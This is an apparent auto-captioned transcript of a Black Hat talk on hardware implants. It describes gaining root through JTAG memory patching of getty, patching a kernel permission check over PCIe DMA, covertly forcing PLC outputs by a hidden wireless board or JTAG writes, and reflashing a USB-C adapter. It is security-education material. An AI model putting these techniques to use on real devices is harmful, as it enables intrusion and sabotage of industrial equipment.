The Tao of Hardware the Te of Implants

Video Statistics and Information

Video

Captions Word Cloud

Reddit Comments

Captions

good morning welcome to the Tao of Hardware the day of implants in South Seas gh with Joe Fitzpatrick before we start a few brief notes be sure to stop by the business hall located in Bayside a/b the black hat Arsenal is on in the palm folder on level 3 and of course the Arsenal reception at 1700 if you haven't picked up your merchandise today is your last chance to visit the black hat swag and book store and also be sure to visit the Kali Linux lab and Mandalay Bay I heard it's pretty cool also thanks for putting your phone on vibrate got further ado hey how's it going I'm actually going to double check and make sure no one modified the sign because I I've seen a lot of interesting science going around don't know how that could happen good morning this is tab hardware tey of implants who here likes hardware who here likes all the hardware talks at blackhat who here would rather be at the SC Talk the secure Enclave talk actually no I'd rather be here but there's a pretty cool secure Enclave to talk going on right now that I really wanted to see but oh well you're stuck with me instead you'll probably actually get a seat in here you might not get a seat in there so welcome I'm Joe Fitzpatrick my background is Electrical Engineering with some CS and InfoSec mixed in there I've been over 10 years doing professional hardware stuff I did silicon debug on CPUs I did security research hardware pen testing of desktop and server PP CPUs both pre and post silicon so you know you think of a code review you think of like mowing through lines of C or JavaScript or whatever language that kids are using these days do the same thing but with vera log it's a lot uglier because very log is ugly the past five years I've been doing Hardware security training the past four with my own business right now I am teaching applied physical attacks on x86 systems just finished a four day class ask anybody who may have been in that class how it was because I think it went really well I also have a similar class apply for school attacks on embedded systems which focuses more MIPS and arm targets as well I'm also one of the organizers of besides PDX if any of you need an excuse to come to Portland it's a really awesome place besides PDX is there come bug me I'll tell you what it is and it'll be great it'll be fun you'll have voodoo doughnuts and you'll get to see all the places in Portlandia but you're not here to hear about that you're here to hear about hardware or something so there might be some confusion with the title of this talk you know that it's not this tau it's that tau it's the philosophy it doesn't have anything to do with tailored access operations department of the NSA don't worry about that any any confusion is entirely coincidental so what is tau tau is this Chinese philosophy it's the absolute principle of the underlying universe combining the principles of yin and yang it's the way the code the behave it's just the natural order right so the Tao of hardware is that hardware really is the absolute that underlies everything in the world of computing no matter how much time you spend making your cool software security stuff it's still got to run on someone's hardware and you gotta hope that that hardware is in good shape for you on the other hand Tay is the Chinese velocity of inner character and inner power and integrity and so the Tay of implants in this case is harnessing understanding the inner strength of these tiny little minor additions that we can make to a system Cheers it's just water I swear so Lao Zi is the author of touching or the purported author and he said do the things while they are simple and do the great things while they are small right we talk about all the things we can do in hardware and we have these systems where people chain like 15 vulnerabilities to go and like pop calc right wouldn't be cool if we could just get down to the lowest layers and like do it where we only have to flip one bit or twiddle one byte or pull one wire and bypass all that difficult software stuff I don't know if you've noticed I don't really like software nearly as much as I like hardware mostly because it's hard and I'm not very good at the software side of things so the hardware stuff I love it's fun you know it's wires I can see it and touch it software or whatever so hardware implants pre 2013 there's some prior art but not much when people thought about Hardware implants yeah the term probably didn't have a as much of a as use back then but what people thought of that was basically these like mod chips for game consoles right this is really the only thing we had where you would go and buy a piece of hardware and stick it in another piece of hard we're and do something cool and you could use these and you could play backup games and you could like play homebrew games and there are no illegal uses of these things at all the point is this is this is a hardware implant right we got this tiny little circuit board we solder it and Andy is nice Lily what little well-marked places you know it's all lined up it's very easy to use you know this is that this is a very consumer friendly hardware implant isn't it right but what happened there Spiegel had this article where they have a catalogue that advertises the NSA toolbox the ant catalog who knows if this is legit or not don't worry I'm not going to be showing any possibly confidential or top-secret documents on the screen so you have to shield your eyes if you happen to have regulations or rules about that anyway the media saw this they loved it woah look this is magic they can do magic with hardware and it's really not magic and we're like hey we could do that so we did the NSA playset who has been to like an SI place that talked or played with an NSA playset toy at some point in time it's fun stuff isn't it so the point is like hey we can do this let's let's start building this stuff so we did we started building these things what we learned is that malicious hardware implants are real someone is doing a lot of work making them or at least making pretty convincing powerup PDF files and advertising them Hardware implants don't live in a vacuum this is the big key one for me like I think I got hardware access I can do everything I want to I don't stop to think that like if I can extend that to software access then someone who knows what they're doing can do a whole lot more than me a lot more easily so a lot of these hardware implants they get stuck in a system they give software access they grant software ass gets they escalate privilege and then the rest of the thing all the real malware the fun stuff the the you know pop shells and you know stuff that happens in software so the hardware's in there it does its job it backs off and lets the software take control it makes a lot of sense to do it this way right because I mean I mean software developers they're a dime a dozen right no hardware guys we're in high demand anyway at least I pretend to think that I just I just play a hardware guy on on stage so we have five implants we're going to talk about today blinding is finally escalating privileged using JTAG patching kernels via DMA on an embedded device enabling wireless control of an off-the-shelf PLC hot plugging a malicious plc expansion and a bad USB style.display adapter so I don't know if any of you look at these lists but there's been some rants about junk hacking and hacking bus stop you know anybody can go and buy a ten dollar device at a consumer electronics store open it up and do bad things to it right so what's the deal why are we talking about this at black hat and DEF CON and all these like world-class conferences well the reason is the skills and tools and everything that we use on junk hacking is the exact same skills and tools and everything we use on critical infrastructure you open up a home wireless router and you open up a PLC controlling a centrifuge and you're gonna find similar chips and the same kind of board layout so there's probably a lot of people who go and do interesting things to critical infrastructure and they're probably under NDA but they're probably not under NDA over like webcams and TV tuners and wireless routers so when you see someone talking about this stuff it's like this is how I can present you these skills this is how I can show you the state of the art without causing it to be too bad anyway let's go on so first actually I'll drink to that Cheers it's all vodka I mean water so a blind Esk privilege using JTAG who's used JTAG before okay anybody know what it stands for joint test access group that really helps you understand what it is right so if you kind of put it into this this OSI model you've got a physical layer where you have a bunch of pins ones and zeros that twiddle on top of that you have a state machine and on top of that you have a interface to give you instruction registers and data registers and we can keep extracting all this we get up the next level we have processor or target specific information mips does it different from arm does it did from x86 but really we have software that abstract solve at the very top level we have boundary scan we can control the iOS of the device we have halt resume control and we have memory access so we can execute what we want and we can execute it when we want it and we're in charge of the CPU so if you're curious for more of this there's a presentation from 44 on last year and besides Portland last year JTAG to route 5 ways there's five different ways we went through and used JTAG to get a root shell it's a pretty neat thing to walk through if you're because I looked around and I realized like there's a lot of people who are hardware people who say oh we've got JTAG we win and then there's easy software people who are like well I only speak root shell like that doesn't help me like I understand I win but how do I actually play the winning move so came up with a couple examples of how to do this how to take that last step one of the interesting ones is patching Getty Getty is a binary process it runs in memory and what it does is it sits there and waits for you to connect and when you connect right it passes your username on to log in and log in normally asks you for your password in order to present like command injection so if your username is like - f space something you know what it does is it has this - - at the end of the command line operators operations so that - - says do not accept any more flags after this if we can go into memory and we can patch this one-bite in memory from a - - - a - f or passing a - f - log in and log into a force authentication they won't ask us for a password so how we're going to do this so this is solder peek I presented this last year at blackhat it's a toy from the NSA playset it's basically an Arduino board and it has a bunch of pins that are JTAG pins it's got a I - C flash chip that stores an svf file a pseudovector format file which plays back a series of JTAG commands so we'll go and use that device we'll pop it into a system this is a look at what the board is it's very simple it's only a handful of components it's much larger than it needs to be you could totally customize this to fit the JTAG pin out of whatever your target system might be in order to generate that svf you could go and manually go through look at the JTAG instructions and figure them out or you could just patch open us if you take the debug output of open OCD which tells you all the IRS and dr's it sends and write a script and convert that into excuse me convert that into an svf file the svf file then you can play back without having to run open OCD so you don't need a full a full stack a full software platform for that anybody bored yet no one's falling asleep yet but this isn't the talk right after lunch that's the worst one that's what I normally get so I gonna flip over to a demo video so part in my command line lets fullscreen that oh that's not fullscreen well it'll have to do so this is the Galileo it's an x86 like dev platform I try and log into it as root it asked me my password that's kind of what you would expect right it's really slow too it's 400 megahertz like 486 class processor so logon as Galileo it asks us for password we can log in but you know we're just a user that's no fun we want to we want a privilege escalation exit get out of here now let's go back and look at our Galileo I've got this slot slot solder peek all set up and programmed and it's gonna plug into the jtag port on the back of this board luckily this is a development board it's kind of contrived to target it already has the JTAG header there but I mean it's running a full Linux install we just go over we plug our JTAG adapter in around the 3d printed stander that I made I'm proud of myself it's the first 3d print I actually made from scratch yay hardware so we plug it in it gets power once it gets power it starts playing back an SDF that svf is going to go through to actually four different spots in memory and patch them because what I found is getti always lives in certain spots on this platform so I just patch them all do it the rough way so it's running there it's plugged in it's patched so we don't see no flashing lights we don't want our implant to announce to the world we go back to our console we try to log in as root and we win yeah good shells so and yeah we aren't actually really we can look at the shadow file yada yada yada thank you for clapping I gave a very similar presentation recently with the exact same demo video and no one clapped but I think I think it was a software audience so I had to say I should like say it look it's a root shell you know it's got the thing you do so whatever so I know I know you guys are a sharp crowd then so there's the Galileo oh so I didn't have a I thought oh yeah Little Miss ordering up slides so what it's cheap it's simple it's readily available I used a custom board you could have just as easily used an Arduino Pro micro which is like less than two square inches the payload can be prototyped with standard tools you can use open o CDs protect our payload and then program into this device if the header already is there all you have to do is plug it in there if it's not you might have to figure out a pin out figure out pogo something to do like that it's small enough you can stick it pretty much anywhere and here's the cool thing J Tyga's JTAG is JTAG right I've used this exact same device on arm on MIPS on x86 granted like we said before we've got that stack up the upper layers are different the meaning of those iers and DRS are different but the physical layer the hardware which is what matters to me is all the same so the next one patch kernels on via DMA to an embedded device so what is DMA we normally see this this diagram from the piece that you specification DMA is a situation where we have a device like this PCI Express endpoint over here maybe it's a network adapter and it's receiving packets it wants to hand those off to the system instead of going and handing byte by byte to the CPU it's able to go and walk straight over the root complex straight to memory so a endpoint can go and write to memory this is how a graph is card is gonna pass graphics stuff frame buffer maybe textures whatever between main memory and graphics memory the point is DMA is direct memory access we have devices that aren't the CPU we have other people in the system who can read and write memory so there's a brief history there's actually a long history of DMA attacks but I'm gonna give you a brief version on the left which I guess is your left because the slides are flipped anyway on your on on the left is Tribble which is board designed by Joe grant and some friends of his it's a PCI board you plug it in and there's a little hard drive right there this PowerPC processor goes through and periodically reads all of memory and dumps it to a disk for later fun stuff on the right is that fund a PCI Express - firewire adapter so there's a whole you know basically a decade of people talking about the fact that when you have firewire you have a peer-to-peer connection and one of the profiles allows DMA access so there's a bunch of tools you can use you can plug firewire devices into Thunderbolt you can plug them into a Express card slot you can put them in a PCI Express slot and suddenly the system is now vulnerable as soon as it loads those firewire drivers you plug the cable between the two of them and you can win meaning get memory and get privilege escalation and maybe even root shells so a couple years ago I presented this I actually part of the NSA place that I called it slot screamer I found this rep this reference board for this chip which is a a USB 2 PCI Express Bridge if you want to find more details of that just search for slot screamer I think I put a link in there somewhere and what I can do is I can plug this into a PCI Express slot and then from an attack computer I can go and sit there and craft PCI Express packets from usb over USB so I write Python into piece Express it gets thrown over the PCI Express hierarchy and it goes and reads memory and it brings it back to me what's cool about this is you know everybody thinks peace of express they think graphics card and motherboards and x86 pcs and home desktops and maybe you think about the fact that laptops have like a mini PCIe slot this little blue card inside fits in a mini PCIe slot but there's a lot of arms and MIPS systems now that actually have PCI Express slots as well so this is an Nvidia Jetson board I actually played with this in the flatscreen where they they actually use some hardware DMA protection that I didn't spend the time to get around but there's other devices like this this is a $10 Pogoplug $10 you get and get a system that actually supports PCI Express it doesn't really support it because as you see I've soldered some wires on they're very tiny wires I soldered them to the right pins I put the right resistors and capacitors in there so I could wire those out to an external PCI Express slot and then I could do DMA fun stuff but you're like $10 $10 in the device has a piece of Express slot that's cheaper than any devices you can get to put into the slots cheaper than the PCB of the board you would put into the slot onward I have found this guy it's a MIPS router and you can see I stuck the board in there and used some high quality electrical tape to plug it in this is a mediatek processor mediatek MIPS processor if you look at the functional block diagram you see it's actually got three separate pieces Express ports as I mentioned before I wrote some P some Python that crafted X PCI Express packets that I send over USB to this device what we're going to target this time is a CL and system a CL enforcement so normally when you go and look at a file it checks the permissions on the file it calls this function generic permission finds out if your permission and if you do it returns zero if you don't it returns negative access which is negative 13 I believe so what we want to do is want to go find the spot in the kernel in memory where this is and luckily on a simple system the kernel always lives in the same spot and we're gonna go and find it we're gonna patch it and change this negative 13 to a zero so we always win so let's flip over to the video and pardon the blue blue bars so here's that mediatek platform just kind of walking through that's the CPU they've got two separate files for lots of radio stuff this one's kind of cool it's got a flash chip that holds the whole firmware this chip over somewhere over here I'm gonna point to it eventually there we go that's a SATA controller which is connected via PCI Express and here's my malicious board plugged into the PCI Express mini PCI Express slot right now it's connected over a USB to my laptop and I have a serial console to connect to it so let's see we go here we go we're on a cat at C shadow we're just a user we look at it and we see that it is owned by root and I don't have permission to it i cat it permission denied well let's let's work around that we'll go over to the other window eventually I really need to get a like I stand for my phone so you don't get sick watching these videos I wrote a little script patched generic permission it locates the USB device it's gonna go through and find the address in memory patch that specific address in memory and it's done so that's the card basically a USB cable to that card went through generated PCI Express packets which wrote memory now I go back and I can cat my cat Etsy shadow and yeh so you know last time I delivered this it was after lunch so maybe everybody was just asleep and instead of clapping who want to go back we can always unpatch it we put it back to the sister this state it wasn't before and yeah come on I don't know what I'm doing oh yeah gotta move the mouse select the right window permission denied so yeah we secured the system whoo there you go so this is not truly an implant yet because I'm lazy this little board has an 8051 CPU whenever I get around to it I'm gonna write some code for that 51 CPU to automate all this but as of right now I just use a USB cable to do it in Python because I can handle Python 8051 requires like low-level languages and compilers which are fun and all but that sounds like work toolchains of the hardest part which is no different than hardware either but you know so onward no I don't have a what so what so what basically these invented put devices they are fully featured computers now and we keep saying that over and over again all these IOT devices they're susceptible to all the same things that desktop computers were in laptop computers were even down to the hardware level now where we're adding all of these high-speed interfaces that are very highly privileged so next we're gonna move out of the junk hacking realm and into the like spoil all of your water and destroy the power grid type world so we're gonna level a wireless control of an off-the-shelf PLC this is a siemens s7 200 I borrowed this from a friend it's a kind of an old PLC hey hey I had looked at PLC's before let me open this up so I open it up pop it off oh oh right there we see a chip it's got a product number I can look up that thing and get the datasheet I right know right away this is a RAM chip because of the pinout I recognize that the shape and form factor and I know this is a flash chip I could look up the part numbers I can figure them out I can read them that's all well and good that's that's the software approach yeah tampering with firmware that's kind of whatever let's look at the hardware we got on to the next layer and this whole board is dedicated to input and output so if you notice there's a bunch of output buffers that control what gets output to the outer system it takes the the low-level voltage that comes from the CPU that the GPIO output and turns it into a relay or turns it into like a 24 volt output likewise there's a bunch of input buffers that take you know high voltage or something in and/or analog voltages in and condition them so they're just right for the CPU whip down to the next layer and that's just capacitors and power stuff which is really fun but there's not a lot we can do so back up a level to this layer we noticed that there's this can you make out that header in the middle I hope so yeah it looks better on your screen than mine probably cuz there's not giant lights flashing in your eyes we look at this header we have a bunch of pins and if we use a multimeter we can find out that these buffers connect to these pins which brings them up to the next layer to the CPU these buffers connect to these pins that bring them up to the CPU so let's take a look at that it's kind of a double layered 0.1 inch header if we could intercept any one of those signals we could control what happens on any output downstream from the CPU so I thought okay this is great I'm gonna go and I'm gonna make an implant right this little guy is an Arduino board that cost $2 and an NRF Raider that costs $1 and I put out like $1 worth of wire so like the wire cost is a significant portion of the amount of cost of this implant I stick it in there and I want to just I want to snip one of those leads and put it in place but and this is someone else's hardware and they didn't want me to tamper with it and besides when you when you do put it back together right you can't see it right the device is in there you've taken the top off the device you still can't see the implant onward you know put it back together there's no tamper evident anything you can pop the tabs off the side open it close it many times you'll never notice it but I couldn't get software for this device so we made no software changes right all the original hardware is in there the modification that I might have made isn't not apparent and one signal could be wireless set on set that connector that we looked at also connects to this db9 programming port which would be great if we wanted to intercept the programming that was going on the device as well so I wanted to get this working I wanted to demonstrate it and I went and I looked and it was nearly impossible to get the software to configure this guy I've later found out there's actually an open-source software package that does it as well I haven't put with that yet so it's actually cheaper for me to go and buy a newer system and do the same thing and I thought okay it's a newer system they're gonna they're gonna like have updated somebody it's gonna be all integrated into a single chip like you know progress and stuff nope similar to how it was before actually this goes straight down to the the i/o board the ir board is a little different it has one giant header instead of two small headers you can see those white things at the bottom of the relays and the power board at the very bottom there was a CPU board just above which i failed to show you what I did notice is this thing has LEDs on the front that show you which inputs and outputs are on and off so what it is I looked at those LEDs and you see there's like little gold holes underneath so on the left are the LEDs these white things right underneath em is this little hole that is a via to the other side those vias connect over here down here so I traced these signals out they go through this buffer chip up to this these legs over here that's the bottom of the connector that goes to the next board when I go to the next board I look at the connector and I trace it right these four signals right here are outputs and they all go through this little package right here this is a bank resistor so it's a whole bunch of resistors in one chip because it's easier to place one chip than it is place for small resistors this resistor actually protects the input and outputs of the CPU and the other circuit so all I need to do is solder one wire on to this one spot right here and I can control the output of the relay without the with the operating system without the software having any means of actually knowing what's going on it's gonna spit out a 1 on this wire on the other side of this resistor it's gonna be a 0 if I say so so let's walk up the video of installing and using this implant other screen three so here's the little implant does it put it in a ziploc bag because you know then it's not gonna short things out i soldered one leg to a ground on a capacitor another to a power pin on a chip that I recognized I was able to get the datasheet and that one data pin is the one that actually does the the flipping of the bits I have to get all those little itty bitty wires so they don't interfere with things I put it in I'll get the top board and mount it right on top once I get things out of the way there we go top board plugs on and that's where that big chip in the middle is the CPU it's got flash and RAM as well tuck those wires in so it doesn't get doesn't get found put the case back on top snap and then we are gonna go turn it on and I'm gonna walk through and I don't believe you have audio but let's see is this mic work maybe I'll just what it's a plane okay so it's gonna beep as soon as I go start playing with the switches I'm gonna this is the demo mode I'm gonna turn it clear it and turn it on and set it and then there's like a reset latch I let go I need to put the second input and that resets it simple demo that's just how they work put them both on and they go on until one goes off there you go I'm gonna go over here and I have another wireless adapter hooked up to my laptop the exact same hardware just with a longer wire and I have a little shell scrap to basically under send a serial command and output to one output to zero and disabled so disabled with high impedance it lets the system regain control of the output so let's look over here when it beeps that's the multimeter telling us that this output is on and shorted out I'm remotely turning it on and off and you'll notice there's no light lit up on the LED to shell it tell us the output is on right we go I've turned it off it thinks it's not it's on but no beep so it's off right I used my software control our radio control I can turn it on/off and disable it another fun trick I can do is I can go over and this device has all sorts of stuff built in to make sure it doesn't do things that shouldn't do I can go through and send a bunch of commands and turn it on and off really fast which for some things might be really bad think about anything electronic that shouldn't be turned on and off fast onward let's see half an hour so so what it's a cheap implant it's mostly off-the-shelf open-source code but literally I took the demo file and like changed three lines to make this work and this could be retrofitted to pretty much any i/o type if you know where to put this wire where to toggle that bit you can use this on any kind of system so onward let's do a militia hot plug a malicious PLC expansion module this is another PLC I got I bought it because it's the cheapest one you can buy on digi-key it's made by Phoenix Contact which is actually a pretty good company and it's a nicely well designed peace thing with some decent software but the first thing I do when I open this up is I look at it and like there's one thing that just jumps out at me and says Joe look at me look at me look at me and it's over here in the bottom-left corner anybody know what that is JTAG yay and once we have JTAG we have fun and win and we can look at the chip it's an XP LPC 1765 which I can go and get a datasheet for and know exactly how to use luckily I look at the datasheet and oak there's code security protection there's security we're gonna be foiled you can disable JTAG on this chip you can disable to disable flash updates you can disable it to disable access to any JTAG commands but this is the real world anybody gonna guess what it was set to yeah wide open so looking at it like this is this is a spot where our little expansion module plugs in and you may not be able to see it but in the middle is a little black header I can't believe it's either eight or ten pins in the middle that's where it connects right next to it are these pins like hmmm that's nice and close so this is the USB connector that normally goes in there that lets you program it this is the blank that's in there when it's not in use and if the connector it normally connects with after the USB one so if I have JTAG what can I do I look at the memory map of this chip and I see there's a range dedicated to GPIO and there's a bunch of bits that I can use to set and unset the GPIO values specifically that the port Finn pin value and it tells me the address in memory that I go to excuse me to set or unset that I look at the relays off top I know that that's what makes things happen I use my multimeter and trace it down to figure out which GPIO pin of that nxp chip is the one I want to talk to I look at the datasheet and find out what address it's at and I'm gonna make a JTAG script that's gonna go and write to that address and turn on or off that GPIO so back to a video rifle for the sharp ones we'll notice I only have four videos yet I said five implants so you're like oh he's gonna cheat us I'm gonna cheat you anyway hooking up the same way as before we've got our little display we can go through and we can enable and disable an output using the front and you know it outputs it beeps makes a loud annoying noise we can re set the output or clear the override I've got my implant that I'll pick up and show you it's got a bunch of pogo pins right those pogo pins are lined up to match with those JTAG pins so all I need to do is plug it in and it'll play my script because it's gonna get power and go it's set up to go and actually hear this is what a pogo pin is if you're not familiar it's a little like cones that two pins that have a spring inside so they they're they're springy so I pop this in it's going to wait five seconds it's going to write to that i/o port and thank you and the thing is like we just hope that the processor wrote a bit and then stopped and we can go at the software doesn't know that happened it doesn't check the value of that register all we do is hit the buttons and we can go and disable it there's no no persistent control there we didn't know there we go again we didn't go and change the code in memory we didn't modify them and we just went straight to the GPIO if you wanted to you could tamper with memory you could you know write your malware whatever the fun things you like to do with software er you have the power to do at that point there we go so what JTAG could be disabled but it's usually not sometimes you get situations where it actually is disabled but the way it's disabled is a way that you can work around with more intensive hardware hacking at some point in time you just have to figure out how much money want to spend do you want to spend a hundred thousand dollars or ten thousand dollars and use a fib to enable JTAG it might be worth it might be worth it for you again that would be more invasive it wouldn't just be an implant tangent test editors are quick and easy to access this can be used on a unit in operation and you can just be like walking by on a factory tour and just be like you know and have it timed to I mean you could you could combine this with the other one and they get remote look at trouble you could you can do whatever you want when it's Hardware all the doors are open for you right and when you get JTAG working you win right when you have JTAG you own the cpu you own memory you're in charge again there's all these caveats there's when it JTAG is disabled there's when you have Hardware protections but that's kind of what you get so the last one we've got is a bad yo speed style display adapters and this is one that I have high hopes for and I'm just gonna show you where I am with it because it's not actually I haven't turned it into an implant yet because I'm busy and lazy so you know there's been some previous presentations actually from the NSA playset there's this one on the left is blinker cough it was a basically a modified VGA cable that you'd like let's say install a bunch of these and they would use infrared communications to make like a little mesh network and exfiltrate data over i2c fun stuff you know you think about a Faraday cage right it's supposed to keep everything in and out but it's just a mesh of copper like lights that flash around might actually not get through unless you're in a fancy place that has infrared infrared communication blockers on the right we have alloy fiber this cable over here it looks like IV Thunderbolt 2 VGA adapter with a sketchy old VGA cable but this is actually a fire Thunderbolt cable that goes all the way through and connects to this box with current which Canadian contains a slot screamer and a daisy chains an actual VGA adapter so that you can go and plug in so like I could have plugged in right here to a sketchy VGA cable with it oh they already have the adapter for my macbook everything shows up on the screen just as normal but mean in the meantime there's a box under the table that's copying the contents of my memory well so USB C is this new thing it's like this magic thing the new MacBook has so they have this pretty like the ability to connect everything you need the idea with USB C is they wanted to make this the universal port like universal serial bus so they combined a whole bunch of different protocols into it just like we're at Thunderbolt was this interconnect you just DisplayPort or PCI Express USB C allows you to do display port if it's Thunderbolt enabled it allows you to do PCI Express it allows you to do all this stuff over a single port what's interesting is what's in these adapters so if you have the new MacBook or I think the the Chromebook pixel the only port you have is USB C port it's even used for charging so you have to pay 80 bucks for this fancy cable that gives you power display and USB to do anything right so you'd plug that in and you plug a hub in and you plug your remote in and then you plug everything else in that's why costs 80 bucks there's also probably like $70 worth of shielding wrapped around that I already peeled off the $20 version is like the cheap one you can get on Amazon which is the one I normally use but instead I'm using this this one which is also ripped open it's this is neat it's a firmware update I will show you that in just a second if we look at the Apple ones though what do we see JTAG so again I I noticed this I've hooked it up it is the in fact JTAG I haven't poked at it or modified or flash anything but think about it we've got this device it's the trusted device we carry around with us it's the one we plug in when we present and this is not a passive device anymore we're not dealing with a display adapter we're just dealing with a expansion to our system that is potentially very low level access to the hardware that also does display so let's look at the cheap one right we put rip it open you've got one chip right there again USB see can do native DisplayPort in this inside here there's a little chip and that does the DisplayPort to VGA adapter protocol changing and then the next thing we look at this chip is an XP chip that is a USB power delivery chip and this is what negotiates with the host to say hey I'm a vga adapter which means I need 5 volts at you know 500 milliamps please send me that power which seems reasonable right except it might also say hey I'm a laptop send me 20 volts at 4 amps and that can make bad things happen to devices that weren't expecting 20 volts to suddenly be rushing down the USB wires but what's really interesting on this one is this chip and this is another an XP chip it's a USB device this is what tells a system that it's a u.s. display adapter you plug it in it says oh your display adapter let me turn on display stuff and ignore the rest what I noticed though heard of you DFU direct firmware update this chip is firmware updatable over USB yeah hey we just plugged it in over USB so I can dump the firmware off of that go through tamper it modify it send it back and my objective of what I'm gonna do with this one not the one I use when I present but the one I want to share with other people who know that presenta don't play a nasty trick on is I'm gonna have it set up to do the forward and back buttons right as a USB device so you plug this in you think it's your display adapter it also shows up as a here an interface device and lets you advance slides and it's just gonna randomly advance their slides for them I think that's I think that's a fun prank I don't have a video demo I haven't done that yet it's just my plan so pardon me the I I guess I always worry that I'm gonna over over promise and under deliver and a talk I hope I haven't done that cuz I said 5 and I'm only giving you four and a half so please forgive me that means you know on the ratings you just give me a four and a half instead of a five right so DFU util it's free software you go and you open and you can dump the contents of that firmware and you can modify them and write them back it's an arm m0 core so as long as you know how to write arm code you can do fun stuff with that so what when we have only one port that port can do anything it's an implant designers dream hardware isn't just hardware anymore there aren't passive devices right I mean even in a class that each week we play with HDMI you know everybody knows that that somehow the the cable tells the system what the resolution of the display is in order to do that it has to communicate it's a two-way communication over HDMI all these things that we think are passive devices are not anymore there's sad thing is there's no reasonable way for a user to know what a device does right if I go to the Apple Store and I tell them I want to display something and they give me this like okay it's it's a plastic box I got it from Apple it's sealed except for this one isn't sealed we need to have a better way of actually telling people what is inside and what is actually working so today's implants we did a blindly escalating privilege using JTAG right we patch kernels via DMA on an embedded device we enabled wireless control often they off shelf PC a PLC we hot plugged this expansion device which actually used the same JTAG binos code and hardware as the first example but on a very different setting and then we talked about how we could just take take a device that everyone trusts and someone you could buy off a store online and and plug it in and it's just not gonna do what you think it does even though you think it's such a simple adapter so look at this this is all about the DisplayPort stuff stacked up on a $20 bill and so this solder peak couple bucks you know you could do it with an Arduino board and some pogo pins like I did here less than five bucks the Arduino plus the NRF you know three bucks worth of hardware some wires and over here we've got the slot screen which is kind of pricey it's like 60 to 70 bucks but if you're if you're dead set on making an implant I think that's well within your price range the point is between five and seventy-five dollars a hobbyist could build these many of them are actually published on the NSA place that website and github if you're interested in building your own they weigh less than an ounce they can be customized they're all pretty Universal once you get down to the lowest level of the hardware you know ones and zeros are voltages and it doesn't matter whether you're MIPS arm or x86 it's all the same doesn't matter if you're an embedded system it's all the same so you can customize these pretty easily to many different targets and this I really think barely scratches the surface of what's possible these are a bunch of things I built in my spare time I don't actually sell these I don't like have any government contracts where I supply hardware implants to anyone that would really cool actually it wouldn't be pretty cool I would kind of not be interested in doing that if you're thinking of asking me but you know this is what I do for fun so if you're funded if you're a state actor this is well well well within what you should be aware of and you should be able to do with very little time and effort and money hardware is cheap standard interfaces really are standard automating these little devices is trivial if you can't trust the hardware you can't trust the software right if you can't control if you can control the hardware then in some way shape or form you can control the software okay those are my take away he's not gonna leave you with another philosophical thought so there's a story about the three vinegar tasters and there's lots of old images you know pictures of these guys so on the Left we've got confuse which I think the left is Confucius right he tastes this bowl of this jar of vinegar and it says how it tastes sour because vinegar is wine that has been polluted that's past its prime it's spoiled clearly this represents the conference goer who missed the open bar right now the next one is Buddha right he tastes the vinegar he says oh this tastes bitter but you know life is pain and suffering that's what we should expect and we should just deal with it he's probably an instant responder okay lastly we have Lau's a and he's smiling he tastes the vinegar and he's like up vinegar I know what I'm doing and he goes and gets some peroxide and some salt and he mixes it up and he uses that to etches PCBs to make his hardware implants so [Applause]

Info

Channel: Black Hat

Views: 1,103

Rating: 5 out of 5

Keywords: Information Security, InfoSec, Black Hat, BlackHat

Id: UpaX6_Z3joU

Channel Id: undefined

Length: 43min 9sec (2589 seconds)

Published: Tue Nov 22 2016